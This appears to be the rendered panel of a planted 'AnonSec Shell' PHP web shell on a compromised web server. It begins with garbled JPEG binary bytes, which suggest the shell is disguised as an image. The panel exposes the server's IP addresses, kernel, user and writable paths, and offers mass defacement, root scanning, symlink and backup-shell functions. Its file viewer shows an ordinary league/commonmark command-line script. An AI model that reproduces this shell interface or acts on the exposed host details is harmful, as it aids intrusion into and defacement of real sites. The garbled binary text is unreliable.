JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.12.187   [ Reverse IP ]
Web Server : Apache/2.4.67 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-184.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www_local/modis.angelopescatore.it/vendor/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www_local/modis.angelopescatore.it/vendor/bin/commonmark
#!/usr/bin/env php
<?php

trigger_error('The "bin/commonmark" command has been deprecated since league/commonmark 1.4', E_USER_DEPRECATED);

requireAutoloader();

ini_set('display_errors', 'stderr');

$options = array();
$options_raw = getopt('', array(
    'use-asterisk',
    'use-underscore',
    'enable-strong',
    'enable-em',
    'safe',
));
foreach ($options_raw as $option => $value) {
    switch ($option) {
        case 'safe':
            $options['html_input'] = 'strip';
            $options['allow_unsafe_links'] = false;
            break;
        case 'use-asterisk':
        case 'use-underscore':
        case 'enable-strong':
        case 'enable-em':
            if ($value !== true && $value !== false) {
                fail("Invalid value '$value' for option '$option'");
            }
            break;
    }
    $options[str_replace('-', '_', $option)] = $value;
}

foreach ($argv as $i => $arg) {
    if ($i === 0) {
        continue;
    }

    if (substr($arg, 0, 1) === '-') {
        switch ($arg) {
            case '-h':
            case '--help':
                echo getHelpText();
                exit(0);
            case '-v':
            case '--version':
                echo \League\CommonMark\CommonMarkConverter::VERSION . "\n";
                exit(0);
            case '--safe':
                $options['safe'] = true;
                break;
            default:
                $option = explode('=', $arg, 2)[0];
                if (!preg_match('/^--[^-]/', $option)
                    || !array_key_exists(ltrim($option, '-'), $options_raw)) {
                    fail('Unknown option: ' . $arg);
                }
        }
    } else {
        $src = $arg;
    }
}

if (isset($src)) {
    if (!file_exists($src)) {
        fail('File not found: ' . $src);
    }

    $markdown = file_get_contents($src);
} else {
    $stdin = fopen('php://stdin', 'r');

    if (stream_set_blocking($stdin, false)) {
        $markdown = stream_get_contents($stdin);
    }

    fclose($stdin);

    if (empty($markdown)) {
        fail(getHelpText());
    }
}

$converter = new \League\CommonMark\CommonMarkConverter($options);
echo $converter->convertToHtml($markdown);

/**
 * Get help and usage info
 *
 * @return string
 */
function getHelpText()
{
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        return <<<WINDOWSHELP
CommonMark - Markdown done right

Usage: commonmark [OPTIONS] [FILE]

    -h, --help    Shows help and usage information

    -v, --version Shows the currently installed version

    (Reading data from STDIN is not currently supported on Windows)

Examples:

    Converting a file named document.md:

        commonmark document.md

    Converting a file and saving its output:

        commonmark document.md > output.html

Full documentation can be found at http://commonmark.thephpleague.com/
WINDOWSHELP;
    }

    return <<<HELP
CommonMark - Markdown done right

Usage: commonmark [OPTIONS] [FILE]

    -h, --help    Shows help and usage information

    -v, --version Shows the currently installed version

    --safe        Escapes all raw HTML input and removes unsafe URLs

    If no file is given, input will be read from STDIN

Examples:

    Converting a file named document.md:

        commonmark document.md

    Converting a file and saving its output:

        commonmark document.md > output.html

    Converting from STDIN:

        echo -e '# Hello World!' | commonmark

    Converting from STDIN and saving the output:

        echo -e '# Hello World!' | commonmark > output.html

Full documentation can be found at http://commonmark.thephpleague.com/

HELP;
}

/**
 * @param string $message Error message
 */
function fail($message)
{
    fwrite(STDERR, $message . "\n");
    exit(1);
}

function requireAutoloader()
{
    $autoloadPaths = [
        // Local package usage
        __DIR__ . '/../vendor/autoload.php',
        // Package was included as a library
        __DIR__ . '/../../../autoload.php',
    ];
    foreach ($autoloadPaths as $path) {
        if (file_exists($path)) {
            require_once $path;
            break;
        }
    }
}

Anon7 - 2022
AnonSec Team